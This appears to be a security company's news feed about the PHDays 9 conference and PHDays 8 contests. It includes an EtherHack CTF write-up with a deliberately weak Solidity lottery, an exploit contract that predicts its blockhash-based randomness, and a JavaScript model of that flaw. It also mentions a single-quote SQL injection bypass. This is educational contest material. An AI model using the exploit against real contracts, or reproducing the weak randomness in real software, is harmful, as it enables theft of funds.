News
Become a speaker at PHDays 9!
The Call for Papers is now open for the Positive Hack Days forum on practical information security. Please send your application by May 31. Both esteemed experts and young specialists are welcome. An international program committee consisting of independent researchers and leading IS and IT experts will select the best submissions. Under the banner of "Breaking the constant," we will pay close attention to the relationship between society and technology. Presentations will target a more diverse audience than just information security experts, also addressing the IS impact on e-government, finance, cyberinsurance, blockchain, energy in the digital age, cloud computing, telecoms, the relationship between business and technology, globalization, biohacking, and the future of intellect.

We also welcome practical findings and research outcomes in different areas of cybersecurity:
Security of embedded systems and the IoT for homes and businesses
Blockchain flaws and vulnerabilities
Telecom security
Security of smart homes and video surveillance (CCTV)
Security of financial technologies and tools
Security of web and business applications
Reverse engineering
Applied cryptography
Machine learning
Malware and exploit development
Targeted attacks and hardware backdoors
Secure development and automation of protection tools

Participation formats: Report (50 minutes), Fast Track (15 minutes), and Hands-on Lab (up to 4 hours). To participate in the conference, please fill out the application form at phdays2019.exordo.com. For more information, check the Call for Papers page.
PHDays 9 tickets available now
The early bird catches the worm, as well as a nice discount on tickets to PHDays. Act by January 10, 2019, and get a ticket for both days for just RUB 7,337! On January 11, prices will increase to RUB 9,600 for two days and RUB 7,337 for one day. And starting March 1, you'll have to pay RUB 14,400 for two days and RUB 9,600 for one. Quantities are limited! So don't delay and get your PHDays 9 ticket at a special low price! There are also ways to snag a PHDays ticket for free. Dazzle us with security research you're willing to present, win in one of our special hacking contests, or join one of the teams in The Standoff. More details to come!
Breaking the constants at PHDays 9
Exciting news: the slogan and topics are now out for next year's Positive Hack Days international forum on practical security. Under the banner of "Breaking the constant," speakers and contests at PHDays 9 will situate information security in the wider context of the relationship between society and technology. The event will bring hackers, security experts, and IT specialists together with those from fields not traditionally associated with digital security, including medicine, policymaking, and neurotechnology.

What are the constants?
Constants rule the world. Any event, from the birth of a snowflake to exchange rate fluctuations, can be described with the help of unchanging numbers such as pi, the gravitational constant, and the golden ratio. We now live in a digital world where virtually all human activities depend on information technologies. Our digital world is subject to its own constants. Cloud computing, big data, artificial intelligence, machine learning, blockchain, virtual reality, and the Internet of Things all seem unshakable, if not inevitable. But if constants rule the world, who rules the constants? Can we take them for granted? What if they are broken by something—or someone? At PHDays 9, we are going to take a peek at the butterfly effect in today's age. By rethinking widespread assumptions, we can start imagining what might happen if these constants crumble.

Boris Simis, Deputy CEO at Positive Technologies, said: "Government, business, and individuals live in a digital world. No longer is technology something that concerns 'computer people' only. The purpose of PHDays 9 is to help governments, businesses, IT, and security experts take a fresh look at the digital constants through the lens of information security. Discussion will include e-government, finance and banking, cyberinsurance, blockchain, energy in the digital age, cloud computing, globalization, telecoms, the information security market, relationship between business and technology, biohacking, and the future of intellect."

PHDays 9 will be distinguished by a particularly wide-ranging list of topics. Keynotes, presentations, and roundtables will offer something for both security professionals and anyone interested in the impact of security on nearly every area of life. More details will become available in February.

Real world, real hands-on
Presentations at PHDays 9 will target a more diverse audience, with a balance between content intended for novices and technical experts. Key topics will include:
Security of embedded systems and the IoT for homes and businesses
Blockchain flaws and vulnerabilities
Telecom security
Security of smart homes and video surveillance/CCTV
Security of financial technologies and tools
Security of web and business applications
Reverse engineering
Applied cryptography
Machine learning
Malware and exploit development
Targeted attacks and hardware backdoors
Secure development and automation of protection tools

Contests are at the heart of PHDays 9. Timur Yunusov, member of the PHDays organizing committee, explained: "At PHDays 9, we are making a special effort to encourage a wider range of participants to compete. Besides competitors who prepare well in advance, we also want to inspire spur-of-the-moment participation by ordinary forum visitors. This is why most contests will be in workshop format: every few hours, visitors can come up and get an explanation of the basic principles, enough to complete at least a trivial task. Learning by doing will help participants to quickly grasp the subject and apply knowledge in practice. As always though, our classic hardcore hacking contests will be back in full force."

Contest workshops will vary in complexity and subject matter, including industrial and financial systems, home and industrial IoT, smart cars and devices, reverse engineering, radio and hardware, and cryptography. For many, The Standoff is the highlight of PHDays. This intense badguys-versus-goodguys cyberbattle will be the centerpiece of the contests, just as in past years. More about The Standoff will come later, so stay tuned! PHDays 9 will be held on May 21–22, 2019, in Moscow at the Crocus Expo International Exhibition Center. Tickets will go on sale in December.
PHDays moves to Crocus Expo: check out the new venue
The dates of Positive Hack Days 9 are already out: the forum will be held on May 21–22, 2019. This time the organizers have chosen one of the largest and best equipped venues in town—the Crocus Expo International Exhibition Center. Crocus Expo hosts hundreds of large-scale and high-profile events annually, including national and international exhibitions, conferences, symposiums, and sports competitions with participation from both Russian and foreign companies. The new venue is twice as large as the World Trade Center Moscow, which previously hosted the event. Just to give you an idea, the smallest conference hall in the World Trade Center seats 60 people, while Crocus Expo halls start at 160. This year there will be room for everyone who wants in on the Positive Development User Group, we promise! :) PHDays 9 will occupy the entire Crocus Congress Hall (Hall 20, Pavilion 3). It's a one-of-a-kind transformer hall whose layout can be configured as needed. That means we will be able to expand our agenda considerably.
Positive Hack Days 9 to be held May 21–22 at Crocus Expo
The dates of the ninth Positive Hack Days are now out: next year's forum will take place at an all-new venue, the Crocus Expo International Exhibition Center, on May 21–22, 2019. More visitors are coming to PHDays every year: in 2018, over 5,000 people were in attendance. Crocus Expo offers more space than the World Trade Center Moscow, which will enable hosting an even larger number of guests and speakers. Preparations have already started for the event program, The Standoff, and competition infrastructure. The agenda will include several tracks addressing security research, technology-related risks for businesses and governments, and other topics. A new point of emphasis will be the impact of information security on the lives of ordinary people. In addition, effort will be made at PHDays 9 to reach out beyond security practitioners to include developers and IT professionals. A number of talks and workshops will attempt to bridge the gap between the IT and infosec worlds. Timing of the Call for Papers has been announced: proposals from interested speakers will be accepted from January 14 to March 14, 2019. Tickets for PHDays will go on sale in December. As in past years, PHDays promises to excite with its competitions, in which participants demonstrate threats potentially facing critical infrastructure, banking and government systems, blockchain, the Internet of Things, and more. Spring is still over six months away, so in the meantime we encourage you to enjoy the highlights from PHDays 8, recordings of which you can watch online.
The Standoff at Positive Hack Days 8: attack debriefing
The Standoff was back this year at Positive Hack Days 8, where over 100 participants on 12 attacker teams, 7 defender teams, and security operations center (SOC) teams were eager to show their mastery of the digital systems of an entire mock city. The city network was monitored by three Positive Technologies products:
MaxPatrol SIEM – security information and event management (SIEM)
PT Network Attack Discovery – network traffic analysis, incident detection, and investigation
PT MultiScanner – multilevel system for identifying and blocking malicious content

Functioning of these products and game events were all under the watchful gaze of the Positive Technologies Expert Security Center (PT ESC), which shared its findings with the PHDays audience. So many events took place that it would be impossible to describe them all. Here we will focus on describing the networks of Office 2 (belonging to fictional systems integrator SPUTNIK) and Office 1 (belonging to fictional insurer BeHealthy). Office 2 was interesting because it was monitored by the Rostelecom SOC but not protected by any defender team, so attackers had free run of its systems. Besides these two offices, the city also contained an electrical plant with substation, railroad, smart homes, and banks with ATMs.
Cyberbattle at PHDays, or How to hack city infrastructure in 30 hours
For the third year running, the highlight of the hacking contests at Positive Hack Days is The Standoff, in which teams of attackers, defenders, and security operations centers (SOCs) do battle in a virtual city. Experience in 2016 and 2017 showed the appeal of this ultrarealistic format for both participants and visitors at PHDays. So there was no doubt among the organizers that The Standoff deserved to return this year. In 2018, a total of 19 teams took part in The Standoff, and for nearly 30 hours, these teams fought for control of the city. The defenders stood fast, but the attackers still managed to pull off some hacks: according to the rules, some targets were deliberately left unprotected. Meanwhile, the battle among the attacker teams for first place was rather hot indeed—the scoreboard was turned nearly upside down just half an hour before the end of play. Read on for a blow-by-blow account of what happened during these two exciting days.

Day 1: Getting the lay of the digital land
Events were slow in coming on the first day. Attackers took their time reconnoitering and learning about the targets. As announced previously, the city's economy was based on digital technologies. City infrastructure included an electrical plant and substation, railroad, office buildings, energy-efficient smart homes, banks with ATMs and self-service kiosks, mobile communications, the Internet, and online services.
PHDays 8: EtherHack contest writeup
At this year's PHDays, we held an all-new contest named EtherHack. Participants were on the clock as they solved tasks involving smart contract vulnerabilities. Here we present the contest tasks along with a detailed explanation of the intended solutions.

Azino 777
Win the lottery and hit the jackpot!
The first three tasks featured poor randomness issues that were covered in our recent research: Predicting Random Numbers in Ethereum Smart Contracts. As an easy warmup, the first task was based on a pseudorandom number generator (PRNG) that relied on the blockhash of the last block as a source of entropy for generating random numbers:

pragma solidity ^0.4.16;

contract Azino777 {
    function spin(uint256 bet) public payable {
        require(msg.value >= 0.01 ether);
        uint256 num = rand(100);
        if(num == bet) {
            msg.sender.transfer(this.balance);
        }
    }

    // Generate a random number between 0 and max
    uint256 constant private FACTOR = 1157920892373161954235709850086879078532699846656405640394575840079131296399;

    function rand(uint max) constant private returns (uint256 result){
        uint256 factor = FACTOR * 100 / max;
        uint256 lastBlockNumber = block.number - 1;
        uint256 hashVal = uint256(block.blockhash(lastBlockNumber));
        return uint256((uint256(hashVal) / factor)) % max;
    }

    function() public payable {}
}
Because the result of block.blockhash(block.number-1) would be the same for any transaction within the same block, a successful attack could use an exploit contract with the same rand() function to call the target contract via an internal message:
    // Members of the exploit contract: target is an Azino777 state variable,
    // and rand() is a verbatim copy of the target's function
    function WeakRandomAttack(address _target) public payable {
        target = Azino777(_target);
    }

    function attack() public {
        uint256 num = rand(100);
        target.spin.value(0.01 ether)(num);
    }
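The predictability described above, as an added example written for this page rather than taken from the contest or the Positive Technologies research: a JavaScript (Node.js) port of Azino777.rand() over a supplied previous-block hash, using BigInt so the arithmetic matches the EVM's uint256. Because the hash of block N-1 is public once that block is mined, an off-chain model and the on-chain contract compute the same draw for every transaction in block N. The sample hash is constructed for the check and is not a real block hash; the function names are this example's own.

```javascript
// Added example, not code from the PHDays write-up: an off-chain model of Azino777.rand()
// in JavaScript. BigInt reproduces the EVM's uint256 arithmetic, so anyone holding the
// previous block's hash (a public value) computes the same number the contract will.
const UINT256_MOD = 1n << 256n;

// Same constant as in the Azino777 contract: roughly 2^256 / 100.
const FACTOR = 1157920892373161954235709850086879078532699846656405640394575840079131296399n;

// Parse a 0x-prefixed 32-byte hash into a uint256, as uint256(block.blockhash(...)) does.
function hashToUint256(blockHashHex) {
  const value = BigInt(blockHashHex);
  if (value < 0n || value >= UINT256_MOD) throw new RangeError('not a 32-byte value');
  return value;
}

// Port of Azino777.rand(max): factor = FACTOR * 100 / max, result = (hash / factor) % max.
// Solidity 0.4 integer multiplication wraps modulo 2^256 silently; the % mirrors that
// (FACTOR * 100 happens to stay below 2^256, so nothing wraps here).
function rand(blockHashHex, max) {
  const m = BigInt(max);
  const factor = ((FACTOR * 100n) % UINT256_MOD) / m;
  const hashVal = hashToUint256(blockHashHex);
  return Number((hashVal / factor) % m);
}

// The lottery and a predictor evaluate rand() inside the same block, so both read the
// same previous-block hash. Returns what spin() draws, what a caller reusing rand()
// predicts, and whether a given bet would have won.
function playInBlock(previousBlockHashHex, bet) {
  const contractDraw = rand(previousBlockHashHex, 100);  // what spin() computes
  const predictorGuess = rand(previousBlockHashHex, 100); // what a copied rand() computes
  return {
    contractDraw,
    predictorGuess,
    betWins: bet === contractDraw,
    predictorWins: predictorGuess === contractDraw,
  };
}

// Defender's view: how many distinct outcomes can rand() produce across any number of
// transactions mined in the same block? Always one, so per-block entropy is zero.
function distinctOutcomesInBlock(previousBlockHashHex, transactions) {
  const outcomes = new Set();
  for (let i = 0; i < transactions; i++) outcomes.add(rand(previousBlockHashHex, 100));
  return outcomes.size;
}

// Constructed sample input (not a real block hash): a 32-byte value whose integer
// quotient by FACTOR equals draw (0..99), so rand(hash, 100) returns draw.
function constructedHashForDraw(draw) {
  const value = FACTOR * BigInt(draw) + 5n;
  return '0x' + value.toString(16).padStart(64, '0');
}

// Stand-alone run: a block whose previous hash makes 42 the winning number.
const sampleHash = constructedHashForDraw(42);
console.log(playInBlock(sampleHash, 42));            // betWins and predictorWins are both true
console.log(distinctOutcomesInBlock(sampleHash, 50)); // 1
```

Run it with node. The takeaway for a reviewer auditing a contract like this is that anything derived from block.blockhash(block.number - 1) is a constant for the whole block, so rand() carries no entropy against a caller executing in the same block, which is exactly what the exploit contract above relies on.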
Private Ryan
We added a private seed, nobody will ever learn it!
This task is a slightly tougher twist on the previous one. A variable seed, deemed private, was used as an offset to block.number so that the blockhash would not be dependent on the previous block. After each bet, seed would be overwritten with a new "random" value. This was the case with the Slotthereum lottery.
contract PrivateRyan {
    uint private seed = 1;

    // Constructor (Solidity 0.4 style): seeds the generator once at deployment
    function PrivateRyan() {
        seed = rand(256);
    }

    function spin(uint256 bet) public payable {
        require(msg.value >= 0.01 ether);
        uint256 num = rand(100);
        seed = rand(256);
        if(num == bet) {
            msg.sender.transfer(this.balance);
        }
    }

    /* ... */
}
Similarly to the previous task, an attacker would just need to copy the rand() function into the exploit contract, but this time the value of the private variable seed would need to be obtained off-chain and then supplied to the exploit as an argument. To do so, one could take advantage of the web3.eth.getStorageAt() method of the web3 library:
MeterH3cker contest writeup: hacking smart meters at PHDays 8
The contests at this year's Positive Hack Days included MeterH3cker, an all-new competition for hacking the smart grid. Participants had the run of two mock buildings powered by solar panels; excess power was sold back to the grid at a special rate. The job of the participants was to interfere with metering by any means necessary in order to improve their account balance. Stand
Mr. Robot entertains visitors of PHDays 8
Mr. Robot again cheered guests of Positive Hack Days. This year, people could not only play a quiz, but also upgrade their skills using hacking tools or even have an interview for a job at Positive Technologies! Over 2,000 people came to have a talk with our chatbot, and that certainly boosted its artificial ego :) Keep reading for more details.

What's new?
The robot's software underwent substantial changes. Alexander Melkikh shared upgrade details: "We added new interactive features to our robot: in addition to contests (Quiz and Hacking Crash Course), it now has new activities—Get a Job at Positive Technologies and Meet Your Security Soulmate. Because of that, we had to rewrite the backend. Last year, we had had raw PHP that caused us a lot of problems; that's why this time we applied Falcon, an easy-to-use Python web framework."

Contests
The forum visitors enjoyed the contests. The most popular again was the Quiz. The rules are similar to Who Wants to Be a Millionaire: participants answer multiple-choice questions of varying difficulty. We prepared many sets, each containing five questions that were displayed on the screen in random order. Most questions were tongue-in-cheek, but some were intricate and related to information security, for example reverse engineering. If a participant made a mistake, the robot neglected the first law of robotics for a while and punished the unlucky contestant with a water jet shower so strong that even bystanders got wet. So, everyone could freshen up a little in the midst of PHDays :) Winning the Quiz brought no awards, because the robot believes that it's not the winning that counts, it's the taking part and enjoying the process.

No wonder the second most popular contest was the Hacking Crash Course, because we wanted participants to have fun and try their hand at different subjects in a short time. This contest had three courses, about 15 seconds each. The first course, SQL Injection, was a fictitious e-banking website with a form to enter login and password. To bypass authorization, participants had to press the single quote key on the software keyboard and then click Enter. This year, participants could also try out the IDA and Radare disassemblers. The IDA course teaches a well-known feature that lists all strings in a binary and is invoked with Shift+F12. The Radare course explained how to quit the disassembler; the authors of the course meant it as a joke about the complicated and obscure key combinations in Radare. The robot was friendly and prompted participants: if someone did not know which keys to press, the correct key on the keyboard lit up dimly after a few seconds, so all participants successfully completed their training. Successful completion of the course was confirmed by a certificate with the participant's photo, taken by a webcam above the screen at the moment of completion.

The most complex and important part of the robot's activity this year was an interview for a job at Positive Technologies. Penetration testers and incident response and application protection specialists created quizzes for applicants in various areas. An applicant chose one of the suggested areas and answered 5 questions drawn from a considerable list. More than one answer could be correct for some questions. If an interview had positive results, the applicant's photo and test results were sent to the HR chat in Telegram, and a certificate was printed out. The applicant could come to the HR stand with this certificate to receive a gift and continue the interview.

The contest Meet Your Security Soulmate was similar to Tinder, a popular dating application. The only difference was that participants needed to swipe quotations of information security celebrities, not photos. Some quotations were real, and others were generated from the original utterances. If most quotations were by the same person, the robot showed a photo of this celebrity together with the participant and turned on a romantic song.

Summary
Statistics confirmed that people are eager to communicate with artificial intelligence. More than two thousand people took part in the robot's contests during the two days of the forum. About 1,800 participants tried the Quiz (in 2017 there were 1,400 participants), and 820 got a water shower for wrong answers (1,300 people were unlucky in 2017). The Hacking Crash Course was taken by 160 people (360 in 2017). The interview for a job at Positive Technologies was taken by 226 people, and 105 participants found their security soulmate.